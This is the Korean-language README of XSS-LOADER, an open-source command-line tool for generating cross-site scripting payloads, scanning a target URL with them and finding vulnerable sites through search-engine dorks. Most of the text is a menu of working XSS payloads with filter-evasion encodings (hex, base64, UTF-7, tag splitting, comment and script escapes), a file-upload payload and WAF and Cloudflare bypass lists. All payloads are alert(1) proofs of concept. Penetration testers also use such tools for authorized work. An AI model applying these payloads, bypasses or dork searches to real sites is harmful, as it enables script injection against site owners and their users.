
Xss 페이로드 생성기 ~ Xss 스캐너 ~ Xss Dork Finder

XSS PAYLOAD GENERATOR -XSS SCANNER-XSS DORK FINDER를 위한 올인원 도구
Instagram: TMRSWRR

git clone https://github.com/capture0x/XSS-LOADER/
cd XSS-LOADER
pip3 install -r requirements.txt
python3 payloader.py
기본 매개변수를 다음으로 설정 :<script>alert(1)</script>
기본 매개변수를 다음으로 설정 :<div onpointerover='alert(1)'>MOVE HERE</div
기본 매개변수를 다음으로 설정 :``````
기본 매개변수를 다음으로 설정 :<body ontouchstart=alert(1)>
기본 매개변수를 다음으로 설정 :<svg onload=alert('1')>
사용자가 작성한 페이로드를 인코딩합니다.
선택한 태그의 페이로드를 인코딩합니다.
* | 1. 대문자----> <SCRIPT>ALERT(1)</SCRIPT>
* | 2. 대소문자 혼합----> <ScRiPt>aleRt(1)</ScRiPt>
* | 3. URL 인코딩 -----> %3Cscript%3Ealert%281%29%3C%2Fscript%3E
* | 4. HTML 엔티티 인코딩-----> <script>alert(1)</script>
* | 5. 페이로드 분할 -----> <scri</script>pt>>alert(1)</scri</script>pt>>
* | 6. HEX 인코딩 -----> 3c7363726970743e616c6572742831293c2f7363726970743e
* | 7. UTF-16 인코딩 -----> 페이로드를 utf-16 형식으로 인코딩합니다.
* | 8. UTF-32 인코딩-----> 페이로드를 utf-32 형식으로 인코딩합니다.
* | 9. 태그 삭제 -----> ";alert('XSS');//
* | 10. 유니코드 인코딩-----> %uff1cscript%uff1ealert(1)%uff1c/script%uff1e
* | 11. US-ASCII 인코딩 -----> ¼script¾alert(1)¼/script¾
* | 12. BASE64 인코딩 -----> PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
* | 13. UTF-7 인코딩 -----> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
* | 14. 괄호 우회 -----> <script>alert`1`</script>
* | 15. UTF-8 인코딩 -----> %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE
* | 16. 태그 블록 탈출-----> "><script>alert(1)</script>
* | 17. 스크립트 탈출-----> </script><script>alert(1)</script>
* | 18. 파일 업로드 페이로드-----> "><script>alert(1)</script>.gif
* | 19. 주석 내부 우회-----> <!--><script>alert(1)</script>-->
* | 20. 변이 페이로드-----> <noscript><p title="</noscript><script>alert(1)</script>">
* | 21. 잘못된 형식의 IMG-----> <script>alert(1)</script>">
* | 22. 공백 우회----->
* | 23. 하위 수준 숨김 블록-----> <!--[if gte IE 4]><script>alert(1)</script><![endif]-->
* | 24. WAF 우회 페이로드 목록-----> WAF 우회 페이로드 목록 보기
* | 25. Cloudflare 우회 페이로드 목록-----> Cloudflare 우회 페이로드 목록 보기
* | 26. 폴리글롯 페이로드 목록-----> 폴리글롯 우회 페이로드 목록 보기
* | 27. 경고 페이로드 목록-----> 경고 페이로드 목록 보기
* | 28. 모든 페이로드 생성-----> 모든 페이로드 생성 보기
* | 29. 메인 메뉴로 돌아가기
* | 30. 종료
먼저 대상의 URL을 입력해야 합니다. 다음 예시와 같이 URL을 입력하세요==>예: target -----> http://target.com/index.php?name= 스캔할 페이로드 목록을 선택합니다.
스캔 후 결과는 "vulnpayload.txt"에 추가됩니다.
먼저 검색할 dork를 입력하세요: e.g---->inurl:"search.php?q=" 스캔 후 결과는 "dork.txt"에 저장됩니다.
중요:
Windows에 설치된 python3에서 도구를 사용하려면 아래 링크를 다운로드하세요:
https://github.com/capture0x/XSS-LOADER-for-WINDOWS
버그 신고나 개선 사항은 이슈를 열어 주세요.
저작권 2020